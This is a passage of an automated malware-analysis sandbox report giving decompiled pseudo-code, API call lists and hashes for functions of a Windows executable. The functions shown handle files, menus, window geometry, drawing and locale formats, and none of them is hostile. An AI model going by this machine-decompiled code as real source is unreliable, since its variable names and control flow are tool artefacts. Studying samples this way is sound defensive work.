                                                                        • GetFileType.KERNEL32(?,000000F5), ref: 00402CB1
                                                                        • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402CCC
                                                                        • GetLastError.KERNEL32(000000F5), ref: 00402CE4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                        • String ID:
                                                                        • API String ID: 1694776339-0
                                                                        • Opcode ID: 9aee0fbc78375ed4c045fe708eee76b85e86ea9ef32a4d9543f669cd10d059a6
                                                                        • Instruction ID: 72d0798c9f897f459679b6debe79a3b22e66610cb6c7dbc6d0f179f518ddef03
                                                                        • Opcode Fuzzy Hash: 9aee0fbc78375ed4c045fe708eee76b85e86ea9ef32a4d9543f669cd10d059a6
                                                                        • Instruction Fuzzy Hash: 07418270108700AAF7309F248B0D72B76A5EB00754F248E3FE096BA6E0D6FDA885975D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00451F78, Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00451F78(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x229)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x22f)) != 1) {
							_t48 = GetSystemMenu(E0043CC2C( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}





                                                                        0x00451f7f
                                                                        0x00451f89
                                                                        0x00451f92
                                                                        0x00451f9c
                                                                        0x00451fa5
                                                                        0x00451faf
                                                                        0x00451fc8
                                                                        0x00451fd7
                                                                        0x00451fe1
                                                                        0x00451fee
                                                                        0x00451ffb
                                                                        0x00452008
                                                                        0x00452015
                                                                        0x00452022
                                                                        0x00000000
                                                                        0x0045202f
                                                                        0x00452043
                                                                        0x0045204d
                                                                        0x0045204d
                                                                        0x00452055
                                                                        0x0045205f
                                                                        0x00000000
                                                                        0x00452069
                                                                        0x0045205f
                                                                        0x00451faf
                                                                        0x00451f9c
                                                                        0x00452070

                                                                        APIs
                                                                        • GetSystemMenu.USER32(00000000,00000000), ref: 00451FC3
                                                                        • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00451FE1
                                                                        • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00451FEE
                                                                        • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00451FFB
                                                                        • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00452008
                                                                        • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00452015
                                                                        • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00452022
                                                                        • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0045202F
                                                                        • EnableMenuItem.USER32 ref: 0045204D
                                                                        • EnableMenuItem.USER32 ref: 00452069
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Menu$Delete$EnableItem$System
                                                                        • String ID:
                                                                        • API String ID: 3985193851-0
                                                                        • Opcode ID: 9e79a2f5eae3ced763728648782822ab3c69376b2aa35a37c87e7f7102866a52
                                                                        • Instruction ID: bab5879344c1d3096d848326a20f741e7fadc53448dec7e96ea0f2bec2258502
                                                                        • Opcode Fuzzy Hash: 9e79a2f5eae3ced763728648782822ab3c69376b2aa35a37c87e7f7102866a52
                                                                        • Instruction Fuzzy Hash: 0F214F703413047AE730AA64CD8EF5A7BE95F05B19F1540A6BA097F2D3C6F9B990861C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00433F38, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 139threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E00433F38(intOrPtr __eax, void* __ecx, char _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				char _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t78;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;
				intOrPtr* _t104;
				intOrPtr _t106;
				intOrPtr _t110;
				intOrPtr _t112;
				struct HWND__* _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t117;

				_t102 = __ecx;
				_t101 = __eax;
				_v5 = 1;
				_t2 =  &_a4; // 0x434259
				_t113 = E00434370( *_t2 + 0xfffffff7);
				_v24 = _t113;
				_t53 = GetWindow(_t113, 4);
				_t104 =  *0x495ad0; // 0x496c04
				if(_t53 ==  *((intOrPtr*)( *_t104 + 0x30))) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t114 = _t101;
					while(1) {
						_t55 =  *((intOrPtr*)(_t114 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t114 = _t55;
					}
					_t112 = E0043CC2C(_t114);
					_v28 = _t112;
					if(_t112 == _v24) {
						goto L25;
					}
					_t12 =  &_a4; // 0x434259
					_t60 =  *((intOrPtr*)( *((intOrPtr*)( *_t12 - 0x10)) + 0x30));
					if(_t60 == 0) {
						_t18 =  &_a4; // 0x434259
						_t106 =  *0x4323f0; // 0x43243c
						__eflags = E00403768( *((intOrPtr*)( *_t18 - 0x10)), _t106);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t20 =  &_a4; // 0x434259
							_v32 = E0043CC2C( *((intOrPtr*)( *_t20 - 0x10)));
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						_push( &_v32);
						_push(E00433ECC);
						_push(GetCurrentThreadId());
						L00406E3C();
						_t126 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E004037D8(_t101, _t126);
						_t78 =  *0x496b8c; // 0x0
						_t110 =  *0x4311cc; // 0x431218
						if(E00403768(_t78, _t110) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t84 =  *0x496b8c; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t86 =  *0x496b8c; // 0x0
						if(E0043CC2C( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t116 = _t60;
					while(1) {
						_t93 =  *((intOrPtr*)(_t116 + 0x30));
						if(_t93 == 0) {
							break;
						}
						_t116 = _t93;
					}
					_v32 = E0043CC2C(_t116);
					goto L19;
				}
				_t117 = E004334C0(_v24, _t102);
				if(_t117 == 0) {
					goto L25;
				} else {
					while(1) {
						_t98 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t98 == 0) {
							break;
						}
						_t117 = _t98;
					}
					_v24 = E0043CC2C(_t117);
					goto L6;
				}
			}































                                                                        0x00433f38
                                                                        0x00433f41
                                                                        0x00433f43
                                                                        0x00433f47
                                                                        0x00433f52
                                                                        0x00433f54
                                                                        0x00433f5a
                                                                        0x00433f5f
                                                                        0x00433f6a
                                                                        0x00433f93
                                                                        0x00433f97
                                                                        0x004340c6
                                                                        0x004340cf
                                                                        0x004340cf
                                                                        0x00433f9d
                                                                        0x00433fa3
                                                                        0x00433fa3
                                                                        0x00433fa8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00433fa1
                                                                        0x00433fa1
                                                                        0x00433fb1
                                                                        0x00433fb3
                                                                        0x00433fb9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00433fbf
                                                                        0x00433fc5
                                                                        0x00433fca
                                                                        0x00433fe8
                                                                        0x00433fee
                                                                        0x00433ff9
                                                                        0x00433ffb
                                                                        0x0043400d
                                                                        0x0043400f
                                                                        0x00433ffd
                                                                        0x00433ffd
                                                                        0x00434008
                                                                        0x00434008
                                                                        0x00434012
                                                                        0x00434012
                                                                        0x00434016
                                                                        0x0043401c
                                                                        0x00434022
                                                                        0x00434028
                                                                        0x00434029
                                                                        0x00434033
                                                                        0x00434034
                                                                        0x00434039
                                                                        0x0043403d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043404b
                                                                        0x00434056
                                                                        0x0043405b
                                                                        0x0043406b
                                                                        0x00434070
                                                                        0x00434075
                                                                        0x00434082
                                                                        0x004340ad
                                                                        0x004340c0
                                                                        0x004340c2
                                                                        0x004340c2
                                                                        0x00000000
                                                                        0x004340c0
                                                                        0x00434084
                                                                        0x00434093
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00434095
                                                                        0x004340ab
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004340ab
                                                                        0x00433fcf
                                                                        0x00433fd5
                                                                        0x00433fd5
                                                                        0x00433fda
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00433fd3
                                                                        0x00433fd3
                                                                        0x00433fe3
                                                                        0x00000000
                                                                        0x00433fe3
                                                                        0x00433f74
                                                                        0x00433f78
                                                                        0x00000000
                                                                        0x00433f7e
                                                                        0x00433f82
                                                                        0x00433f82
                                                                        0x00433f87
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00433f80
                                                                        0x00433f80
                                                                        0x00433f90
                                                                        0x00000000
                                                                        0x00433f90

                                                                        APIs
                                                                          • Part of subcall function 00434370: WindowFromPoint.USER32(YBC,?,00000000,00433F52,?,-0000000C,?), ref: 00434376
                                                                          • Part of subcall function 00434370: GetParent.USER32(00000000), ref: 0043438D
                                                                        • GetWindow.USER32(00000000,00000004), ref: 00433F5A
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0043402E
                                                                        • 72E7AC10.USER32(00000000,00433ECC,?,00000000,00000004,?,-0000000C,?), ref: 00434034
                                                                        • GetWindowRect.USER32 ref: 0043404B
                                                                        • IntersectRect.USER32 ref: 004340B9
                                                                          • Part of subcall function 004334C0: GlobalFindAtomA.KERNEL32 ref: 004334D4
                                                                          • Part of subcall function 004334C0: GetPropA.USER32 ref: 004334EB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$Rect$AtomCurrentFindFromGlobalIntersectParentPointPropThread
                                                                        • String ID: <$C$YBC$YBC
                                                                        • API String ID: 2329882401-525053330
                                                                        • Opcode ID: 67c238a949be0a3692a05650b6b0dd3817a18a1ea391561a0b0d11e4fad90527
                                                                        • Instruction ID: c79d42cd8e63d5d6ca071abcab3a340e76f0d134036ba66e97feda9ca407d93a
                                                                        • Opcode Fuzzy Hash: 67c238a949be0a3692a05650b6b0dd3817a18a1ea391561a0b0d11e4fad90527
                                                                        • Instruction Fuzzy Hash: 4D516D75B00209AFCB10DF69C484AAEB7F4AF48358F105566F914EB391D739EE01CB99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004361C8, Relevance: 13.6, APIs: 9, Instructions: 150COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004361C8(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x436374; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x43636c; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x436374; // 0x0
				if(_t113 != (_t107 &  *0x436370)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x436374; // 0x0
				if(_t114 != (_t107 &  *0x436378)) {
					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					E0041F704( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0041F6E8( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}













                                                                        0x004361cf
                                                                        0x004361d2
                                                                        0x004361d4
                                                                        0x004361d9
                                                                        0x00436356
                                                                        0x00436356
                                                                        0x0043635b
                                                                        0x00436368
                                                                        0x00436368
                                                                        0x004361e3
                                                                        0x004361ed
                                                                        0x004361e5
                                                                        0x004361e5
                                                                        0x004361e5
                                                                        0x004361f6
                                                                        0x0043620a
                                                                        0x004361f8
                                                                        0x00436206
                                                                        0x00436206
                                                                        0x00436210
                                                                        0x00436229
                                                                        0x00436212
                                                                        0x00436220
                                                                        0x00436220
                                                                        0x00436230
                                                                        0x0043626a
                                                                        0x0043626d
                                                                        0x00436238
                                                                        0x0043623b
                                                                        0x0043625f
                                                                        0x00436264
                                                                        0x0043623d
                                                                        0x0043624e
                                                                        0x00436250
                                                                        0x00436250
                                                                        0x0043623b
                                                                        0x00436274
                                                                        0x00436279
                                                                        0x004362bd
                                                                        0x00436281
                                                                        0x00436289
                                                                        0x004362b4
                                                                        0x0043628b
                                                                        0x004362a0
                                                                        0x004362a0
                                                                        0x00436289
                                                                        0x004362d5
                                                                        0x004362e3
                                                                        0x004362eb
                                                                        0x004362fe
                                                                        0x004362fe
                                                                        0x0043630c
                                                                        0x00436314
                                                                        0x00436327
                                                                        0x00436327
                                                                        0x00436331
                                                                        0x00436351
                                                                        0x00436351
                                                                        0x00000000

                                                                        APIs
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 00436201
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 0043621B
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 00436249
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 0043625F
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 00436297
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 004362AF
                                                                        • MulDiv.KERNEL32(?,?,0000001F), ref: 004362F9
                                                                        • MulDiv.KERNEL32(?,?,0000001F), ref: 00436322
                                                                        • MulDiv.KERNEL32(00000000,?,0000001F), ref: 00436348
                                                                          • Part of subcall function 0041F704: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041F711
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 12406acec0809dd684b2cbdaf37a1cf72947fcd2106aa20a73bdfab1a9d6afc8
                                                                        • Instruction ID: 5572a461d4d5c649957c28d46cd97aeae1e5ffce9261f6d8a18b716679afef8d
                                                                        • Opcode Fuzzy Hash: 12406acec0809dd684b2cbdaf37a1cf72947fcd2106aa20a73bdfab1a9d6afc8
                                                                        • Instruction Fuzzy Hash: 9C517070204341AFC720EB69C845B6BBBF9AF4D304F06985EB9D6D7352C639E844CB25
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00437068, Relevance: 13.6, APIs: 9, Instructions: 122windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 37%
                                                                        			E00437068(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				struct HDC__* _t33;
				intOrPtr _t72;
				int _t74;
				intOrPtr _t80;
				int _t83;
				void* _t88;
				int _t89;
				void* _t92;
				void* _t93;
				intOrPtr _t94;

				_t92 = _t93;
				_t94 = _t93 + 0xffffffe0;
				_v5 = __ecx;
				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				}
				_v12 = GetDesktopWindow();
				_push(0x402);
				_push(0);
				_t33 = _v12;
				_push(_t33);
				L00406EBC();
				_v16 = _t33;
				_push(_t92);
				_push(0x437183);
				_push( *[fs:eax]);
				 *[fs:eax] = _t94;
				_v20 = SelectObject(_v16, E0041FC84( *((intOrPtr*)(_t88 + 0x40))));
				_t89 = _v36;
				_t83 = _v32;
				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(0x43718a);
				_push(_v16);
				_t72 = _v12;
				_push(_t72);
				L00407124();
				return _t72;
			}





















                                                                        0x00437069
                                                                        0x0043706b
                                                                        0x00437071
                                                                        0x0043707d
                                                                        0x00437083
                                                                        0x00437093
                                                                        0x0043709a
                                                                        0x0043709b
                                                                        0x0043709c
                                                                        0x0043709d
                                                                        0x0043709e
                                                                        0x00437085
                                                                        0x00437085
                                                                        0x0043708c
                                                                        0x0043708d
                                                                        0x0043708e
                                                                        0x0043708f
                                                                        0x00437090
                                                                        0x00437090
                                                                        0x004370a4
                                                                        0x004370a7
                                                                        0x004370ac
                                                                        0x004370ae
                                                                        0x004370b1
                                                                        0x004370b2
                                                                        0x004370b7
                                                                        0x004370bc
                                                                        0x004370bd
                                                                        0x004370c2
                                                                        0x004370c5
                                                                        0x004370da
                                                                        0x004370e6
                                                                        0x004370ee
                                                                        0x004370fb
                                                                        0x0043711d
                                                                        0x0043713c
                                                                        0x00437156
                                                                        0x00437163
                                                                        0x0043716a
                                                                        0x0043716d
                                                                        0x00437170
                                                                        0x00437178
                                                                        0x00437179
                                                                        0x0043717c
                                                                        0x0043717d
                                                                        0x00437182

                                                                        APIs
                                                                        • GetDesktopWindow.USER32 ref: 0043709F
                                                                        • 72E7ACE0.USER32(?,00000000,00000402), ref: 004370B2
                                                                        • SelectObject.GDI32(?,00000000), ref: 004370D5
                                                                        • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004370FB
                                                                        • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043711D
                                                                        • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043713C
                                                                        • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 00437156
                                                                        • SelectObject.GDI32(?,?), ref: 00437163
                                                                        • 72E7B380.USER32(?,?,0043718A,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?), ref: 0043717D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ObjectSelect$B380DesktopWindow
                                                                        • String ID:
                                                                        • API String ID: 989747725-0
                                                                        • Opcode ID: e8a8121868ac27e57e4faa29e38f03b396699f147222c45ad547c2109a57c072
                                                                        • Instruction ID: 771ec133291533bbbaf77add90e3910cc377049704c9dec5494c1e876cde8f30
                                                                        • Opcode Fuzzy Hash: e8a8121868ac27e57e4faa29e38f03b396699f147222c45ad547c2109a57c072
                                                                        • Instruction Fuzzy Hash: 66310BB6A04219BFDB00DEADCC85DAFB7FCEF49704B014469B544F7281C679AD048BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040AFB0, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E0040AFB0(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b27b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040AE3C();
				E00409A84(__ebx, __edi, __esi);
				_t196 =  *0x4967fc;
				if( *0x4967fc != 0) {
					E00409C5C(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E004099D4(_t43, 0, 0x14,  &_v20);
				E0040439C(0x496730, _v20);
				E004099D4(_t43, 0x40b290, 0x1b,  &_v24);
				 *0x496734 = E004087C0(0x40b290, 0, _t196);
				E004099D4(_t132, 0x40b290, 0x1c,  &_v28);
				 *0x496735 = E004087C0(0x40b290, 0, _t196);
				 *0x496736 = E00409A20(_t132, 0x2c, 0xf);
				 *0x496737 = E00409A20(_t132, 0x2e, 0xe);
				E004099D4(_t132, 0x40b290, 0x19,  &_v32);
				 *0x496738 = E004087C0(0x40b290, 0, _t196);
				 *0x496739 = E00409A20(_t132, 0x2f, 0x1d);
				E004099D4(_t132, "m/d/yy", 0x1f,  &_v40);
				E00409D0C(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E0040439C(0x49673c, _v36);
				E004099D4(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E00409D0C(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E0040439C(0x496740, _v44);
				 *0x496744 = E00409A20(_t132, 0x3a, 0x1e);
				E004099D4(_t132, 0x40b2c4, 0x28,  &_v52);
				E0040439C(0x496748, _v52);
				E004099D4(_t132, 0x40b2d0, 0x29,  &_v56);
				E0040439C(0x49674c, _v56);
				E00404348( &_v12);
				E00404348( &_v16);
				E004099D4(_t132, 0x40b290, 0x25,  &_v60);
				_t104 = E004087C0(0x40b290, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E004043E0( &_v8, 0x40b2e8);
				} else {
					E004043E0( &_v8, 0x40b2dc);
				}
				E004099D4(_t132, 0x40b290, 0x23,  &_v64);
				_t111 = E004087C0(0x40b290, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E004099D4(_t132, 0x40b290, 0x1005,  &_v68);
					if(E004087C0(0x40b290, 0, _t198) != 0) {
						E004043E0( &_v12, 0x40b304);
					} else {
						E004043E0( &_v16, 0x40b2f4);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E004046C0();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E004046C0();
				 *0x4967fe = E00409A20(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B282);
				return E0040436C( &_v68, 0x10);
			}

























                                                                        0x0040afb0
                                                                        0x0040afb0
                                                                        0x0040afb1
                                                                        0x0040afb3
                                                                        0x0040afb8
                                                                        0x0040afb8
                                                                        0x0040afba
                                                                        0x0040afbc
                                                                        0x0040afbc
                                                                        0x0040afbf
                                                                        0x0040afc2
                                                                        0x0040afc3
                                                                        0x0040afc8
                                                                        0x0040afcb
                                                                        0x0040afce
                                                                        0x0040afd3
                                                                        0x0040afd8
                                                                        0x0040afdf
                                                                        0x0040afe1
                                                                        0x0040afe1
